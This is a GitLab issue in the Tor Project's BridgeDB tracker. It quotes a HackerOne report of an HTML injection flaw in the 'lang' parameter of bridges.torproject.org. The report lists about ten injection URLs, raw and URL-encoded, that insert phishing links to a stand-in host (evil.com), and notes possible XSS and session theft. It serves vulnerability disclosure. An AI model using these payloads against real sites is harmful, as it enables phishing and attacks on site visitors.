Skip to content
GitLab
  • Menu
Projects Groups Snippets
  • Help
    • Help
    • Support
    • Community forum
    • Submit feedback
    • Contribute to GitLab
  • Sign in
  • BridgeDB BridgeDB
  • Project information
    • Project information
    • Activity
    • Labels
    • Members
  • Repository
    • Repository
    • Files
    • Commits
    • Branches
    • Tags
    • Contributors
    • Graph
    • Compare
  • Issues 23
    • Issues 23
    • List
    • Boards
    • Service Desk
    • Milestones
  • Merge requests 1
    • Merge requests 1
  • CI/CD
    • CI/CD
    • Pipelines
    • Jobs
    • Schedules
  • Deployments
    • Deployments
    • Environments
    • Releases
  • Monitor
    • Monitor
    • Incidents
  • Analytics
    • Analytics
    • Value stream
    • CI/CD
    • Repository
  • Wiki
    • Wiki
  • Activity
  • Graph
  • Create a new issue
  • Jobs
  • Commits
  • Issue Boards
Collapse sidebar
  • The Tor Project
  • Anti-censorship
  • BridgeDBBridgeDB
  • Issues
  • #40014
Closed
Open
Created May 31, 2021 by Cecylia Bocovich@cohoshOwner

HTML injection vulnerability with lang parameter

We just got the following email through the hackerone:

Hlo Sir,

I want to report the vulnerability and possible bypass methods ...i
found on your site https://torproject.org

This vulnerability is much more html injection and possible xss that may
be used by hackers in order to harm others
for phising purpose...

URL: https://bridges.torproject.org/options?lang=anonyks

this is the vulnerable url where i got my vulnerability,
the parameter is lang= (any string) [here is used AnonyKs]
then after payload is used is : "><h1>Giveaway:-P <a
href="//evil.am">CLICK ME</a> </h1>

so the url become:
URL:
https://bridges.torproject.org/options?lang=anonyks"><h1>Giveaway:-P <a
href="//evil.com">CLICK ME</a> </h1>

copy the url and paste it in the browser
and click on CLICK ME [ there 'click me' is show in three different
places and each redirect to evil.com]

You may fix the upper vulnerability but still there can be other ways
that hacker can use
so...
Now regarding bypass/other possible ways :
URL:
https://bridges.torproject.org/options?lang=anonyks"><h1>Giveaway:-P <a
href="%2f%2fevil.com">CLICK ME</a> </h1>
URL:
https://bridges.torproject.org/options?lang=anonyks"><h1>Giveaway:-P <a
href="http://evil.com">CLICK ME</a> </h1>

now econding,

URL:
https://bridges.torproject.org/options?lang=anonyks%22%3E%3Ch1%3EGiveaway:P%20%3CA%20HREF=%22http://evil.com/%22%3EClickMe%3C/A%3E%20%3C/h1%3E
URL:
https://bridges.torproject.org/options?lang=anonyks%22%3E%3Ch1%3EGiveaway:P%20%3CA%20HREF=%22//evil.com/%22%3EClickMe%3C/A%3E%20%3C/h1%3E
URL:
https://bridges.torproject.org/options?lang=anonyks%22%3E%3Ch1%3EGiveaway:P%20%3CA%20HREF=%22%2f%2fevil.com/%22%3EClickMe%3C/A%3E%20%3C/h1%3E

There are more ways , now they are without <h1> html tag

URL: https://bridges.torproject.org/options?lang=anonyks"><a
href="http://evil.com">Click Me</a>
URL: https://bridges.torproject.org/options?lang=anonyks"><a
href="//evil.com">Click Me</a>

now again encoding them,

URL:
https://bridges.torproject.org/options?lang=anonyks%22%3E%3CA%20HREF=%22http://evil.com/%22%3EClickMe%3C/A%3E
URL:
https://bridges.torproject.org/options?lang=anonyks%22%3E%3CA%20HREF=%22//evil.com/%22%3EClickMe%3C/A%3E

Impact

Alogethee Today i submitted 10 vulnerability  with possible bypass or
possible method that an attactr can use for crime purpose..
So in sum up all urls are:
Url: https://bridges.torproject.org/options?lang=anonyks"><a
href="//evil.com">Click Me</a>
Url: https://bridges.torproject.org/options?lang=anonyks"><a
href="http://evil.com">Click Me</a>
Url:
https://bridges.torproject.org/options?lang=anonyks"><h1>Giveaway:-P <a
href="%2f%2fevil.com">CLICK ME</a> </h1>
Url:
https://bridges.torproject.org/options?lang=anonyks"><h1>Giveaway:-P <a
href="//evil.com">CLICK ME</a> </h1>
Url:
https://bridges.torproject.org/options?lang=anonyks"><h1>Giveaway:-P <a
href="http://evil.com">CLICK ME</a> </h1>
Url:
https://bridges.torproject.org/options?lang=anonyks%22%3E%3CA%20HREF=%22//evil.com/%22%3EClickMe%3C/A%3E
Url:
https://bridges.torproject.org/options?lang=anonyks%22%3E%3CA%20HREF=%22http://evil.com/%22%3EClickMe%3C/A%3E
Url:
https://bridges.torproject.org/options?lang=anonyks%22%3E%3Ch1%3EGiveaway:P%20%3CA%20HREF=%22//evil.com/%22%3EClickMe%3C/A%3E%20%3C/h1%3E
Url:
https://bridges.torproject.org/options?lang=anonyks%22%3E%3Ch1%3EGiveaway:P%20%3CA%20HREF=%22http://evil.com/%22%3EClickMe%3C/A%3E%20%3C/h1%3E
Url:
https://bridges.torproject.org/options?lang=anonyks%22%3E%3Ch1%3EGiveaway:P%20%3CA%20HREF=%22%2f%2fevil.com/%22%3EClickMe%3C/A%3E%20%3C/h1%3E

Impact:
The vulnerability allow a malicious user to inject html tags and execute
Javascript which could lead to steal user's session, peform CSRF attacks
or open a phishing page.

Broadly,

When the input fields are not properly sanitized over in a webpage, thus
sometimes this HTML Injection vulnerability might lead us to Cross-Site
Scripting(XSS) or Server-Side Request Forgery(SSRF) attacks
Assignee
Assign to
Time tracking